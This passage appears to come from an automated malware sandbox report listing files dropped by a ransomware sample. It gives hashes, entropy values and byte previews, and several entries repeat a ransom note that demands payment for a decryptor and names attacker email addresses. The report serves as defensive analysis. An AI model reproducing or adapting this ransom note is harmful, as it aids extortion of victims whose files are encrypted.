                                                                                                                                              SHA-512:19EC2B8BDC8EB3A3932003A9A4C5A8DA21C05F2F4D06FB9898BD056F6BDECB9FD5E8344CD72CFF8F2EE789EDE99D9B8667BB16B7DDC2538470AE241B70A1E3C5
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.T.{...[....A................Y.h.<U)..^......8e.....}.9.0...Q%d`..u.-.eE..8.].h..........(.@.p.r...t...]f.W7N..6..b..nO...N".u=..f...A...8c,.@.[N.A.d..~..9..t.kuU.)]G.90.5..$e..g.^.,w<G.a..b.1....1.X..;.fu...A...C.6;..(...G.];q....C...."..z.VA.Q...:W... .L..$...c....g.50xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):292
                                                                                                                                              Entropy (8bit):7.214203703027411
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:3fxdRrnkXkZt6t/JJcPWOylviNCkDgKEPEVAzP1x16muvkwn:pdJnHZtGvcOOkvEKW+0kwn
                                                                                                                                              MD5:7190C2E69D959BFD724EDE4DC4C27EAF
                                                                                                                                              SHA1:4141FD66E6C03E5C87250705C9E422B2775A5F1A
                                                                                                                                              SHA-256:A0B6E9BE222F9966CEBE9A89638073D0799126A50E36D3C403E59D09C75C897E
                                                                                                                                              SHA-512:1AEED4E6B7EA101A651524C7BB1B048ED6011303C1418E1A45B61C75F2CC38FA6CD7059C8BD5366A060AEA727D71AEB9F4C759AFBABC19E980E5D454142F83C4
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:"Zl9..:TD..(.}.p.......................iv..6.O..LV.. ..9.o.....hH.Ca........&. ...7z......T.........w]f...,..6.j..r.~z..3J_.[2.4...I.&#....}p....1u.k?l.kG.{AX.C.C#.........i@.3.....OZ.[Q9...?K.;CS.q.U*.......h..w.".'.G.:.r..WK..r. j..F..X.fn........c.../..-.....c0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):292
                                                                                                                                              Entropy (8bit):7.124890075102849
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:L66qnylygnRW9nwuAJUeCen8XDscFfOxA0VXtSKb4/k5Zix/RL1xSn:LrqFD9VkUm8XDBfeJhtSKc/k5ZiPL7Sn
                                                                                                                                              MD5:B8D5F716D761AC7EEF012F655B4B5552
                                                                                                                                              SHA1:9BFED2FF80F9FBF56355AE7241256FA50A457BFF
                                                                                                                                              SHA-256:92738A176ECBC1378BEAB547247C55F895B0C0722F7D5DE6DE51D75EBA3DA87E
                                                                                                                                              SHA-512:032FC5196092903919E171FE9DE69405D1686A7D990E973F423D6DDF40802B2FEA668AC3C02D88D4F25E7E9AEB1F1E25B9E23C2F8D61AE2BECFE08C629BDE0F6
                                                                                                                                              Malicious:false
                                                                                                                                              Preview::...].2...................9."O"W./.W.Q.{..Ut...@e.|J4.....Nk"|....R.7...........@.Zo...uI..-....d.x]...*...KTr,...7.%._.IK.d...0...,.c....,..#...R/".....<a...;4..k"....?...z.k...........H1h81FZzu%..)7.....h.H..k..?.2&?.B:..c:|.1.m.?.8...+0D..>......k..;....B..C...S.0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 16 07:54:04 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2675
                                                                                                                                              Entropy (8bit):3.985656421927895
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:8lndQcT0V1HTidAKZdA1kehwiZUklqehGy+3:8lecgVKty
                                                                                                                                              MD5:F1D1947B931947EBB6CA608C9ED331B0
                                                                                                                                              SHA1:163E295A1557CE930FC3C0D4444C1A54649DCBD2
                                                                                                                                              SHA-256:82264113E30B360D023B32089AB4D3D16BD1E4296DAD69949B2F3F366BF6A7CE
                                                                                                                                              SHA-512:1352D9839129533B2EAF0D6A2497370D79C25AB6DACA805AC482607FBCBA61A3B02C443DC1935B0C6E5382CC553F700A096050F9EBC74B924C41DB001DA41917
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:L..................F.@.. ...$+.,....../..O......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.a..PROGRA~1..t......O.I.Y.F....B...............J........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.F....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.[..Chrome..>......CW.V.Y.F....M......................xN.C.h.r.o.m.e.....`.1.....EW.[..APPLIC~1..H......CW.V.Y.F............................P.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.F.....d......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............P.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 16 07:54:04 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2677
                                                                                                                                              Entropy (8bit):4.001678253289969
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:8zVndQcT0V1HTidAKZdA1jeh/iZUkAQkqehdy+2:8hecgVO9Qgy
                                                                                                                                              MD5:62F2F4E13772D472001E58F84E5E4CBC
                                                                                                                                              SHA1:A8BE59C38304B540272B227F075EB74429EEC101
                                                                                                                                              SHA-256:BD47C760CA3D6F28ACA097BD64A0D8857A86B16035CB7E58A8B84624D8543B76
                                                                                                                                              SHA-512:2439DFAAA5936CB310D9E3E1397BEF9C9205D7FF4048C8F7449769CD517C9EE9F35FF76233497349E5D284AF57129109E351AF22442B8B465E3940C7C251E899
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:L..................F.@.. ...$+.,.....c...O......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.a..PROGRA~1..t......O.I.Y.F....B...............J........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.F....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.[..Chrome..>......CW.V.Y.F....M......................xN.C.h.r.o.m.e.....`.1.....EW.[..APPLIC~1..H......CW.V.Y.F............................P.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.F.....d......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............P.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 10:41:16 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2691
                                                                                                                                              Entropy (8bit):4.013079654878852
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:8wndQcT0VuHTidAKZdA14Peh7sFiZUkmgqeh7sXy+BX:8wecgVFnJy
                                                                                                                                              MD5:1297C6B964FFA78180DFC026E0B09F65
                                                                                                                                              SHA1:0396EAA171B8ECB7FD7CDD09B1BD5A76CB0B2244
                                                                                                                                              SHA-256:6014D7EA9635164D751EE584615C2EDB97CD9F320F3D87D09B7361892E5810BB
                                                                                                                                              SHA-512:5B3C7BE72428F146F460EFD44AA88BF84E4F10A2EF2A8BC7C255787FA93FD5C2F1C73E2C3F322B7DE854983E83B7EECBBDE70617EA8785DB34109DB7C97EC1DD
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:L..................F.@.. ...$+.,...............y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.a..PROGRA~1..t......O.I.Y.F....B...............J........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.F....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.[..Chrome..>......CW.V.Y.F....M......................xN.C.h.r.o.m.e.....`.1.....EW.[..APPLIC~1..H......CW.V.Y.F............................P.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VEW.[.....d......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............P.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 16 07:54:04 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2679
                                                                                                                                              Entropy (8bit):3.998554745566326
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:8XGQndQcT0V1HTidAKZdA1GehDiZUkwqehhy+R:83ecgVLPy
                                                                                                                                              MD5:3625210A1B6FF35812E8B991CE259B09
                                                                                                                                              SHA1:5D325292B919389F5999490F6AFD92B32417E7D5
                                                                                                                                              SHA-256:C2508EE057AEABAAC30DEF730E11D329E12DDEC669BFC1E9E8DA3DAB9248A3D1
                                                                                                                                              SHA-512:D1D5920B5BB06C40229F800B452BFFB202572561992B119B33CFB7D3CDE16F77EA9F378A37A36F3CC6D41B74FCAE141EE2ECE4FC086D39DDDE3A15994CFD757D
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:L..................F.@.. ...$+.,.....c...O......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.a..PROGRA~1..t......O.I.Y.F....B...............J........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.F....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.[..Chrome..>......CW.V.Y.F....M......................xN.C.h.r.o.m.e.....`.1.....EW.[..APPLIC~1..H......CW.V.Y.F............................P.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.F.....d......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............P.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 16 07:54:04 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2679
                                                                                                                                              Entropy (8bit):3.988552254166933
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:8NndQcT0V1HTidAKZdA1IehBiZUk1W1qehzy+C:8NecgVr9Ty
                                                                                                                                              MD5:B0E64219FF90A004348E687BAAB03742
                                                                                                                                              SHA1:7D793ED9DB21E2110BDBBE249682F04DEAB5DBAD
                                                                                                                                              SHA-256:F9CEBD6B948BBA1DD9FF489896D88AD064B93B40BF90EAD1FF641DC5B63FEEB6
                                                                                                                                              SHA-512:5AA79497327A4FDCD4F536AF5BD5770B2549DD49E6E61C345D7E776501A94FF26338718F03F8F19F78E19AFAFF50EF60DD060C0486084A87473698DC6070426A
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:L..................F.@.. ...$+.,......'..O......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.a..PROGRA~1..t......O.I.Y.F....B...............J........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.F....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.[..Chrome..>......CW.V.Y.F....M......................xN.C.h.r.o.m.e.....`.1.....EW.[..APPLIC~1..H......CW.V.Y.F............................P.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.F.....d......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............P.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 16 07:54:04 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2681
                                                                                                                                              Entropy (8bit):3.998043696528375
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:8FndQcT0V1HTidAKZdA1duTBehOuTbbiZUk5OjqehOuTbJy+yT+:8FecgVwT2TbxWOvTbJy7T
                                                                                                                                              MD5:55FDC082570EE7B5C55746A82ED47E9D
                                                                                                                                              SHA1:48CB31B1F72A2EEC37C56470D0D54188D09DCEDB
                                                                                                                                              SHA-256:8E5988B73D3BDE06B74BF383093F59F0D4F2FF7D4E046A991C7E9F3451DC8B94
                                                                                                                                              SHA-512:ABD2A804FD78B219F5BC3FACE985E5E756D42E36EDBAA88C94FF8A4F3890A6C17D2CE87E1021C96347E606312D83FFF1FDAD21192EB8F2739CCAD7678DE285E4
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:L..................F.@.. ...$+.,.....e...O......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.a..PROGRA~1..t......O.I.Y.F....B...............J........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.F....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.[..Chrome..>......CW.V.Y.F....M......................xN.C.h.r.o.m.e.....`.1.....EW.[..APPLIC~1..H......CW.V.Y.F............................P.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.F.....d......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............P.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
